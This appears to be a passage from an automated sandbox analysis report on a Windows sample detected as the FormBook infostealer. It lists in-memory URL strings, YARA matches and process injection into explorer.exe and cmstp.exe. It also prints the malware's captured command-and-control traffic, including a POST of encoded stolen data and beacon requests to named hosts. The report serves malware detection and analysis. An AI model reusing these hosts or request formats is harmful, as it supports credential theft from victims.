          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578840779.000000000DA97000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/
          Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
          Source: HI4NJ046K.6.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/domain-registrieren.html
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
          Source: HI4NJ046K.6.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: HI4NJ046K.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: HI4NJ046K.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
          Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknownHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
          Source: unknownDNS traffic detected: queries for: www.white-hat.uk
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: mcwfy.exe, 00000001.00000002.314796170.000000000067A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: u8QPnVhq0N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
